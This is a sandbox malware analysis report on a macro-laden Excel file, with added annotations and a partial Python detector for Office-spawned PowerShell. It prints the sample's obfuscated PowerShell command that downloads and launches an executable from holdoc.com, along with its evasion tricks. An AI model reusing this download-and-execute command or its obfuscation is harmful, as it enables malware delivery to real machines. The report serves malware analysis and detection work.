ID: 47598
Sample Name: 18-02-22-(k-irie).xls
Cookbook: defaultwindowsofficecookbook.jbs
Time: 01:30:58
Date: 23/02/2018
Version: 21.0.0
Copyright Joe Security LLC 2018
Analysis Report
Overview
General Information
Joe Sandbox Version: 21.0.0
Analysis ID: 47598
Start time: 01:30:58
Joe Sandbox Product: CloudBasic
Start date: 23.02.2018
Overall analysis duration: 0h 4m 16s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 18-02-22-(k-irie).xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, GSI enabled (VBA)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.evad.expl.winXLS@5/3@3/2
HCA Information: Successful, ratio: 100%; Number of executed functions: 0; Number of non-executed functions: 0
EGA Information: Failed
HDC Information: Failed
Cookbook Comments:
• Adjust boot time
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint document
• Simulate clicks
• Number of clicks 142
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): WmiApSrv.exe, conhost.exe, dllhost.exe
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: EXCEL.EXE, powershell.exe
Detection
Strategy | Score | Range | Reporting
Threshold | 84 | 0 - 100 | Report FP / FN
Confidence
Strategy | Score | Range | Further Analysis Required?
Threshold | 5 | 0 - 5 | false
Classification
[Classification chart: categories Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware; scale malicious / suspicious / clean]
Analysis Advice
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Signature Overview
AV Detection:
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Software Vulnerabilities:
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Document exploit detected (process start blacklist hit)
Networking:
Downloads files from webservers via HTTP
Performs DNS lookups
Urls found in memory or binary data
Domain name seen in connection with other malware
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
Data Obfuscation:
Document contains an embedded VBA with many string operations indicating source code obfuscation
Obfuscated command line found
Spreading:
Enumerates the file system
System Summary:
Checks whether correct version of .NET is installed
Found graphical window changes (likely an installer)
Uses Microsoft Silverlight
Checks if Microsoft Office is installed
Uses new MSVCR Dlls
Binary contains paths to debug symbols
Binary contains paths to development resources
Classification label
Creates files inside the user directory
Creates temporary files
Document contains an OLE Workbook stream indicating a Microsoft Excel file
Found command line output
Parts of this application are using the .NET runtime (probably coded in C#)
Reads ini files
Reads software policies
Sample is known by Antivirus (Virustotal or Metascan)
Spawns processes
Uses an in-process (OLE) Automation server
Creates mutexes
Document contains embedded VBA macros
Reads the hosts file
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA macro which may execute processes
Powershell connects to network
HIPS / PFW / Operating System Protection Evasion:
May try to detect the Windows Explorer process (often used for injection)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Anti Debugging:
Creates guard pages, often used to prevent reverse engineering and debugging
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Enables debug privileges
Malware Analysis System Evasion:
Queries a list of all running processes
Enumerates the file system
Hooking and other Techniques for Hiding and Protection:
Disables application error messages (SetErrorMode)
System process connects to network (likely due to code injection or exploit)
Language, Device and Operating System Detection:
Queries the cryptographic machine GUID
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Behavior Graph
[Behavior graph; ID: 47598, Sample: 18-02-22-(k-irie).xls, Startdate: 23/02/2018, Architecture: WINDOWS, Score: 84. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other language, Is malicious.]
Process chain: EXCEL.EXE (graph counters: 34, 17) started cmd.exe, which started powershell.exe (graph counters: 12, 8; marked "Is malicious").
Signatures shown on the graph: Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for submitted file; Obfuscated command line found; 3 other signatures; Document exploit detected (process start blacklist hit); System process connects to network (likely due to code injection or exploit); Powershell connects to network.
Network nodes: holdoc.com; 8.8.8.8 (port 53, source ports 53440 and 56842; GOOGLE-GoogleIncUS, United States); 92.53.78.250 (port 80, source ports 49163 and 49164; SELECTELRU, Russian Federation).
Simulations
Behavior and APIs
Time | Type | Description
01:31:49 | API Interceptor | 1x Sleep call for process: EXCEL.EXE modified from: 30000ms to: 100ms
01:31:49 | API Interceptor | 1x Sleep call for process: EXCEL.EXE modified from: 60000ms to: 100ms
01:31:49 | API Interceptor | 1x Sleep call for process: EXCEL.EXE modified from: 300000ms to: 100ms
01:31:54 | API Interceptor | 1x Sleep call for process: powershell.exe modified from: 30000ms to: 100ms
Antivirus Detection
Initial Sample
Source | Detection | Scanner
18-02-22-(k-irie).xls | 31% | virustotal
Dropped Files
No Antivirus matches
Unpacked PE Files
No Antivirus matches
Domains
Source | Detection | Scanner
holdoc.com | 4% | virustotal
Yara Overview
Initial Sample
No yara matches
PCAP (Network Traffic)
No yara matches
Dropped Files
No yara matches
Memory Dumps
No yara matches
Unpacked PEs
No yara matches
Joe Sandbox View / Context
IPs
No context
Domains
Match | Associated Sample Name / URL | SHA 256 | Detection | Context
holdoc.com | 2018.2.20[s_kawadu].xls | 8b93eb0c322299acebe65e6014accdc02f289e3a4bf411783e8bfcd01e887174 | malicious | 47.52.193.63
ASN
Match | Associated Sample Name / URL | SHA 256 | Detection | Context
SELECTELRU | 7969991545.doc | 5ace6070a2f1c6ecaf06b1f8446998e42540254c1d117064445e44f8ccc56739 | malicious | 82.202.221.88
SELECTELRU | trickbot.exe | 91f78068e996b1b32a3539746b6b683f5fa40e7be009b779c56e215b521df6c5 | malicious | 95.213.237.224
SELECTELRU | YhAjMikwxY.docx | 8c30c4096f77feb5103eb18cddc5cb6b74759e7782524dff5bf7335689dce3fd | malicious | 77.244.219.111
Dropped Files
No context
Screenshot
Startup
System is w7
EXCEL.EXE (PID: 3268, cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde, MD5: 716335EDBB91DA84FC102425BFDA957E)
  cmd.exe (PID: 3348, cmdline: cMd /c'poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25;(.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0}{2}{4}\' -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace','%temp%.exe')}while(!$?);&(\'{0}{2}{1}\'-f'star','ss','t-proce') '%localappdata%.exe''', MD5: AD7B9C14083B52BC532FBA5948342B98)
    powershell.exe (PID: 3376, cmdline: poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25;(.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0}{2}{4}\' -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace','C:\Users\HERBBL~1\AppData\Local\Temp.exe')}while(!$?);&(\'{0}{2}{1}\'-f'star','ss','t-proce') 'C:\Users\user\AppData\Local.exe'', MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
cleanup
Created / dropped Files
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\18-02-22-(k-irie).LNK
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Sep 24 13:59:30 2017, mtime=Sun Sep 24 13:59:30 2017, atime=Fri Feb 23 00:31:50 2018, length=76288, window=hide
Size (bytes): 2160
Entropy (8bit): 4.507208926102992
Encrypted: false
MD5: 941E5D0C91732D133D3EA6FCC59651EC
SHA1: F79505767A693BC2431A1998CABAFC764286F0ED
SHA-256: 1E589ACDB46B7DB1C8747C2A13E11AF6183FE3BBDB83F0A00CB03E580C8F814A
SHA-512: 0E29F144B8E6B10C771ABED68BCDB0E85B250D72536565EB6F12C761242790348643968AC17F4D4AED4BF1267DD66A574600640343460306051B13BE3C4F3488
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
File Type: ASCII text, with CRLF line terminators
Size (bytes): 89
Entropy (8bit): 4.308920442144782
Encrypted: false
MD5: 7ECA590620832E8C4F36972F48AB7288
SHA1: 8C564C6FD711A53DCCFB71E204F9C74287840EE5
SHA-256: 7323108B5FB167A226B7D6BBA70E8F7671B3E883C043CA3E5D27E3E9AD33D712
SHA-512: D0A45C0EC7840AC91E7D5024CC0855944610F5DDFA7AC726EB852A325542764960420B9830FA068D19D5FA7D58DECC477475B24E81BF768D7B98F2318C81CFE1
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1IS066BSM420YYOJ2CE3.temp
File Type: data
Size (bytes): 8016
Entropy (8bit): 3.5770961918243596
Encrypted: false
MD5: DE54B0C562108894094B2BEF832CBF46
SHA1: A046BDD493711C314BC0E8040778A17E155C16C5
SHA-256: F268E4960C227505DFEA1FD03987D52DC45095AF7C0820D8C7AA3EB17635C0EE
SHA-512: 0E850A2BDA1A32E812B45FAF424131E7347F09B14CAA0691468CA48A96929934664E57BADAAEAF61BA509B750A7B0834D24E6E18835D7F604D0ADD61508C32DA
Malicious: false
Reputation: low
Contacted Domains/Contacted IPs
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection
holdoc.com | 92.53.78.250 | true | true | 4%, virustotal
Contacted IPs
IP | Country | ASN | ASN Name | Malicious
8.8.8.8 | United States | 15169 | GOOGLE-GoogleIncUS | false
92.53.78.250 | Russian Federation | 49505 | SELECTELRU | true
Static File Info
General
File type: 0
Entropy (8bit): 6.047278042035873
TrID:
• Microsoft Excel sheet (30009/1) 46.87%
• Microsoft Excel sheet (alternate) (24509/1) 38.28%
• Generic OLE2 / Multistream Compound File (8008/1) 12.51%
• Java Script embedded in Visual Basic Script (1500/0) 2.34%
File name: 18-02-22-(k-irie).xls
File size: 75264
MD5: 1fde2f4438d222541a78d63e85043e63
SHA1: a2e40c537dc3a73b77199a4d8eaf76826f819df6
SHA256: f29afa4665c7d226d093d083a72431237b76c9dbb10bf531c3eaa56090ecf277
SHA512: abecf769db1050cec94a76b0cc7eadd645e3061d2bdde6bd2bca0dbcec3e035176b3ecee64bff1e72a75e864b25a6882b5ada58f421c0a3554ec366a07de67a1
File Content Preview: ...... >...... o......
File Icon
Static OLE Info
General
Document Type: OLE
Number of OLE Files: 1
OLE File "18-02-22-(k-irie).xls"
Indicators
Has Summary Info: True
Application Name: Microsoft Excel
Encrypted Document: False
Contains Word Document Stream: False
Contains Workbook/Book Stream: True
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream: False
Flash Objects Count: 0
Contains VBA Macros: True
Summary
Code Page: 1251
Create Time: 2017-10-19 07:59:05
Last Saved Time: 2018-02-22 08:21:27
Creating Application: Microsoft Excel
Security: 0
Document Summary
Document Code Page: -535
Thumbnail Scaling Desired: False
Contains Dirty Links: False
Shared Document: False
Changed Hyperlinks: False
Application Version: 917504
Streams with VBA
VBA File Name: Sheet1.cls, Stream Size: 977
General
Stream Path: _VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name: Sheet1.cls
Stream Size: 977
VBA Code Keywords
Keywords: False, VB_Exposed, Attribute, VB_Name, VB_Creatable, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
VBA Code
VBA File Name: ThisWorkbook.cls, Stream Size: 5760
General
Stream Path: _VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name: ThisWorkbook.cls
Stream Size: 5760
VBA Code Keywords
Keywords: cryocamera "ThisWorkbook" capponecheese zyzybridge ramzessii "xeC" Shell "p://holdoc.com/lantrace','%" "Ct") petroliummer() "owe" "t','ne" depminng Right(Left("multiplexed", copengagend gabrilla False Workbook_Open() zulusniga petroliummer Array("t" (\""{" ramzessii() zyzybridge() gabrilla() goldgoldtime() "o','bj" nagilanile vandamilkler "do{sl" "st','.we" samaramama() Right(Left("lighttight", fidopinions brucegodd Minute(Now), brucegodd(depminng) "}\"" "bclie','em','nt','.ne'" "f'-" "ppd" VB_Base Randomize Left("calamander", samaramama, normalcorrecttoolk "l'+'e')." hannydear VB_Creatable Now(), VB_Exposed Now()) "'sy" maffii fatalerrrrord "DDen "'+'o" fatalerrrrord() Array(Now(), msoAlignLefts depminng() "RS", virtoserer samaramama "-N") "-e") Attribute goldgoldtime Array(Second(Now), VB_PredeclaredId VB_GlobalNameSpace okolokojim heroscopuses "ata") VB_Name Int(Rnd Function VB_Customizable SingleSong() ").(" SingleSong labuyetero VB_TemplateDerived "oke('" Left("Invisible", "w'+'n" Monochrome "t',"
VBA Code
Streams
Stream Path: \x1CompObj, File Type: data, Stream Size: 107
General
Stream Path: \x1CompObj
File Type: data
Stream Size: 107
Entropy: 4.18482950044
Base64 Encoded: True
Data ASCII (readable strings): Microsoft Excel 2003 Worksheet, Biff8, Excel.Sheet.8
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 240
General
Stream Path: \x5DocumentSummaryInformation
File Type: data
Stream Size: 240
Entropy: 3.03421468289
Base64 Encoded: True
Data ASCII (readable strings): 2018, 2, 22, Worksheets
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 168
General
Stream Path: \x5SummaryInformation
File Type: data
Stream Size: 168
Entropy: 3.4271007557
Base64 Encoded: False
Data ASCII (readable strings): Microsoft Excel
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 55082
General
Stream Path: Workbook
File Type: Applesoft BASIC program data, first line number 16
Stream Size: 55082
Entropy: 6.52470798361
Base64 Encoded: True
Data ASCII (readable strings): f2, VARMUS, ThisWorkbook
Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 425
General
Stream Path: _VBA_PROJECT_CUR/PROJECT
File Type: ASCII text, with CRLF line terminators
Stream Size: 425
Entropy: 5.34572053125
Base64 Encoded: True
Data ASCII (truncated in the report):
ID="{6E96D509-D03C-4DAF-BC32-90CB90E3A534}"
Document=ThisWorkbook/&H00000000
Document=Sheet1/&H00000000
Name="VBAProject"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="9193668E6A8E6A8E6A8E6A"
DPB="7E7C899E9B668967896789"
GC="6B699C8D888E88
Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62
General
Stream Path: _VBA_PROJECT_CUR/PROJECTwm
File Type: data
Stream Size: 62
Entropy: 3.05546715432
Base64 Encoded: False
Data ASCII (readable strings): ThisWorkbook (ANSI and UTF-16), Sheet1 (ANSI and UTF-16)
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3005
General
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type: data
Stream Size: 3005
Entropy: 4.49677521188
Base64 Encoded: False
Data ASCII (readable UTF-16 string, truncated in the report): *\G{000204EF-0000-0000-C000-000000000046}#4.1#9#C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\VBE7.DLL#Visual Basic F
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1414
General
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0
File Type: data
Stream Size: 1414
Entropy: 4.24915005422
Base64 Encoded: False
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 106
General
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1
File Type: data
Stream Size: 106
Entropy: 2.1837232906
Base64 Encoded: False
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 548
General
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2
File Type: data
Stream Size: 548
Entropy: 2.31128093652
Base64 Encoded: False
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 481
General
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3
File Type: data
Stream Size: 481
Entropy: 2.76254679194
Base64 Encoded: False
Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 524
General
Stream Path: _VBA_PROJECT_CUR/VBA/dir
File Type: data
Stream Size: 524
Entropy: 6.33160018738
Base64 Encoded: True
Data ASCII (readable fragments of the compressed stream): VBAProject, stdole, *\G{00020430-...-0046}#2.0#0#C:\Windows\SysWOW64\...e2.tlb#OLE Automation, EOffDic, 2DF8D04C-
Network Behavior
Network Port Distribution
Total Packets: 14 • 80 (HTTP) • 53 (DNS)
TCP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 23, 2018 01:31:46.217499971 CET | 56842 | 53 | 192.168.2.2 | 8.8.8.8
Feb 23, 2018 01:31:47.213018894 CET | 56842 | 53 | 192.168.2.2 | 8.8.8.8
Feb 23, 2018 01:31:47.299452066 CET | 53 | 56842 | 8.8.8.8 | 192.168.2.2
Feb 23, 2018 01:31:47.321384907 CET | 49163 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:31:47.321408033 CET | 80 | 49163 | 92.53.78.250 | 192.168.2.2
Feb 23, 2018 01:31:47.321466923 CET | 49163 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:31:47.321856976 CET | 49163 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:31:47.321868896 CET | 80 | 49163 | 92.53.78.250 | 192.168.2.2
Feb 23, 2018 01:31:47.851967096 CET | 53 | 56842 | 8.8.8.8 | 192.168.2.2
Feb 23, 2018 01:33:26.202478886 CET | 49163 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:33:26.202632904 CET | 80 | 49163 | 92.53.78.250 | 192.168.2.2
Feb 23, 2018 01:33:26.202733040 CET | 49163 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:33:26.562745094 CET | 53440 | 53 | 192.168.2.2 | 8.8.8.8
Feb 23, 2018 01:33:26.652406931 CET | 53 | 53440 | 8.8.8.8 | 192.168.2.2
Feb 23, 2018 01:33:26.654766083 CET | 49164 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:33:26.654820919 CET | 80 | 49164 | 92.53.78.250 | 192.168.2.2
Feb 23, 2018 01:33:26.655200005 CET | 49164 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:33:26.655917883 CET | 49164 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:33:26.655945063 CET | 80 | 49164 | 92.53.78.250 | 192.168.2.2
UDP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 23, 2018 01:31:46.217499971 CET | 56842 | 53 | 192.168.2.2 | 8.8.8.8
Feb 23, 2018 01:31:47.213018894 CET | 56842 | 53 | 192.168.2.2 | 8.8.8.8
Feb 23, 2018 01:31:47.299452066 CET | 53 | 56842 | 8.8.8.8 | 192.168.2.2
Feb 23, 2018 01:31:47.851967096 CET | 53 | 56842 | 8.8.8.8 | 192.168.2.2
Feb 23, 2018 01:33:26.562745094 CET | 53440 | 53 | 192.168.2.2 | 8.8.8.8
Feb 23, 2018 01:33:26.652406931 CET | 53 | 53440 | 8.8.8.8 | 192.168.2.2
ICMP Packets
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Feb 23, 2018 01:31:47.852212906 CET | 192.168.2.2 | 8.8.8.8 | cffc | Port unreachable | Destination unreachable
Note: the client sent the same query (transaction 0x2320) twice, one second apart, and received two answers. The second answer (01:31:47.851967096) arrived after the resolver socket on port 56842 had been closed, which is what this ICMP port-unreachable reply to 8.8.8.8 reflects.
DNS Queries
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2018 01:31:46.217499971 CET | 192.168.2.2 | 8.8.8.8 | 0x2320 | Standard query (0) | holdoc.com | A (IP address) | IN (0x0001)
Feb 23, 2018 01:31:47.213018894 CET | 192.168.2.2 | 8.8.8.8 | 0x2320 | Standard query (0) | holdoc.com | A (IP address) | IN (0x0001)
Feb 23, 2018 01:33:26.562745094 CET | 192.168.2.2 | 8.8.8.8 | 0x61b2 | Standard query (0) | holdoc.com | A (IP address) | IN (0x0001)
DNS Answers
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2018 01:31:47.299452066 CET | 8.8.8.8 | 192.168.2.2 | 0x2320 | No error (0) | holdoc.com | | 92.53.78.250 | A (IP address) | IN (0x0001)
Feb 23, 2018 01:31:47.851967096 CET | 8.8.8.8 | 192.168.2.2 | 0x2320 | No error (0) | holdoc.com | | 92.53.78.250 | A (IP address) | IN (0x0001)
Feb 23, 2018 01:33:26.652406931 CET | 8.8.8.8 | 192.168.2.2 | 0x61b2 | No error (0) | holdoc.com | | 92.53.78.250 | A (IP address) | IN (0x0001)
HTTP Request Dependency Graph
holdoc.com
HTTP Packets
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.2 | 49163 | 92.53.78.250 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2018 01:31:47.321856976 CET | 0 | OUT | GET /lantrace HTTP/1.1
Host: holdoc.com
Connection: Keep-Alive

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.2 | 49164 | 92.53.78.250 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2018 01:33:26.655917883 CET | 1 | OUT | GET /lantrace HTTP/1.1
Host: holdoc.com
Connection: Keep-Alive

Note: both requests carry only Host and Connection headers and no User-Agent, which is what System.Net.WebClient sends by default and is a usable network signature for this stage. No inbound HTTP data is recorded in either session, so the payload at /lantrace was never received during the analysis; this matches the Temp.exe file being created and then deleted by powershell.exe (see File Activities below) and the script's retry loop issuing a second request about 99 seconds after the first.
Code Manipulations
Statistics
Behavior
• EXCEL.EXE (PID 3268)
  • cmd.exe (PID 3348)
    • powershell.exe (PID 3376)
System Behavior
Analysis Process: EXCEL.EXE PID: 3268 Parent PID: 2948
General
Start time: 01:31:48
Start date: 23/02/2018
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde
Imagebase: 0x2f310000
File size: 20392608 bytes
MD5 hash: 716335EDBB91DA84FC102425BFDA957E
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Note: /dde is the shell's normal open verb for Office documents, i.e. how Excel is started when the sample is double-clicked; it is not something the sample adds.
File Activities: none recorded for this process.
Registry Activities
Key Created
Source | Key Path | Completion | Count | Address | Symbol
| HKEY_USERS\Software\Microsoft\VBA | success or wait | 1 | 60A4AC61 | RegCreateKeyExA
| HKEY_USERS\Software\Microsoft\VBA\7.0 | success or wait | 1 | 60A4AC61 | RegCreateKeyExA
| HKEY_USERS\Software\Microsoft\VBA\7.0\Common | success or wait | 1 | 60A4AC61 | RegCreateKeyExA
Note: these keys are created by the VBA runtime when it initialises, so their appearance confirms that the document's macro project was loaded and run in the sandbox; they are not persistence.
Analysis Process: cmd.exe PID: 3348 Parent PID: 3268
General
Start time: 01:31:51
Start date: 23/02/2018
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cMd /c'poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25;(.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0}{2}{4}\' -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace','%temp%.exe')}while(!$?);&(\'{0}{2}{1}\'-f'star','ss','t-proce') '%localappdata%.exe'''
Imagebase: 0x49de0000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Note: cmd.exe expands %temp%.exe and %localappdata%.exe before PowerShell sees them. Because neither contains a path separator before ".exe", they expand to two different files (...\AppData\Local\Temp.exe and ...\AppData\Local.exe), as the resolved powershell.exe command line below shows; the abbreviated, randomly cased switches are PowerShell's prefix matching (-NoPr = -NoProfile, -exeCuTi = -ExecutionPolicy, -WinDO = -WindowStyle) used to dodge string-based detection.
Analysis Process: powershell.exe PID: 3376 Parent PID: 3348
General
Start time: 01:31:52
Start date: 23/02/2018
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25; (.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0}{2}{4}\' -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace','C:\Users\HERBBL~1\AppData\Local\Temp.exe')}while(!$?);&(\'{0}{2}{1}\'-f'star','ss','t-proce') 'C:\Users\user\AppData\Local.exe''
Imagebase: 0x22820000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate
Note: decoded, the script block is do { sleep 25; (new-object system.net.webclient).downloadfile('http://holdoc.com/lantrace', 'C:\Users\HERBBL~1\AppData\Local\Temp.exe') } while (!$?); start-process 'C:\Users\user\AppData\Local.exe'. The loop retries the download until DownloadFile succeeds, which accounts for the two GET requests in the capture. The file it downloads to (...\Local\Temp.exe) is not the file it launches (...\Local.exe), so the second stage would not have started even if the download had completed.
File Activities
File Created
Source | File Path | Access | Attributes | Options | Completion | Count | Address | Symbol
| C:\Users\user\AppData\Local\Temp.exe | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 181066F | CreateFileW
| C:\Users\user\AppData\Local\Temp.exe | read attributes and synchronize and generic write | none | synchronous io non alert and non directory file and open no recall | success or wait | 1 | 181066F | CreateFileW
File Deleted
Source | File Path | Completion | Count | Address | Symbol
| C:\Users\user\AppData\Local\Temp.exe | success or wait | 1 | 181006E | DeleteFileW
Note: WebClient.DownloadFile opens the target file before the transfer and removes it when the transfer fails, so create-then-delete of Temp.exe with no inbound HTTP data is the expected trace of a download that never completed, and the download target is the Temp.exe path, not the Local.exe path passed to start-process.
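The chain EXCEL.EXE → cmd.exe → powershell.exe, together with ExecutionPolicy Bypass, WindowStyle Hidden, abbreviated switches in randomised letter case and run-time string building, is what this sample leaves in process-creation telemetry. The following added example (not part of the report and not a Joe Sandbox signature) evaluates constructed process-creation events modelled on the Behavior section: it expands the abbreviated switches by prefix the way powershell.exe resolves them, walks the parent chain looking for an Office process and scores the indicators. The switch table, minimum prefixes and aliases are my approximation of the PowerShell console host's parser, not copied from it; PID 2948 being explorer.exe is an assumption (the report names only the PID); the inventory.ps1 event is invented as a benign control; and the cmd.exe event reuses the resolved command line for brevity where the report shows the unexpanded %temp%/%localappdata% form.

```python
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# (switch, shortest accepted prefix, takes a value), in the order the host tests
# them. Assumption: modelled on PowerShell's ConsoleHost command-line parser.
SWITCHES = [
    ("NoExit", "noe", False), ("NoProfile", "nop", False), ("NoLogo", "nol", False),
    ("NonInteractive", "noni", False), ("Sta", "s", False), ("Mta", "mta", False),
    ("Command", "c", True), ("WindowStyle", "w", True), ("File", "f", True),
    ("ExecutionPolicy", "ex", True), ("InputFormat", "inp", True),
    ("OutputFormat", "o", True), ("EncodedCommand", "e", True), ("Version", "v", True),
]
ALIASES = {"ep": "ExecutionPolicy", "ec": "EncodedCommand", "if": "InputFormat", "of": "OutputFormat"}

# Constructed events (not from the report); PIDs, parents and the powershell.exe
# command line follow the sandbox's Behavior section.
PS_CMD = (
    "poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25; "
    "(.(\\'{2}{0}{1}\\' -f'-o','bject','new') "
    "(\\'{1}{3}{5}{0}{2}{4}\\' -f't','syst','.webclie','em','nt','.ne'))"
    ".('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace',"
    "'C:\\Users\\HERBBL~1\\AppData\\Local\\Temp.exe')}while(!$?);"
    "&(\\'{0}{2}{1}\\'-f'star','ss','t-proce') 'C:\\Users\\user\\AppData\\Local.exe''"
)
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"pid": 2948, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},  # assumed
    {"pid": 3268, "ppid": 2948, "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": "'C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE' /dde"},
    {"pid": 3348, "ppid": 3268, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cMd /c'" + PS_CMD + "'"},
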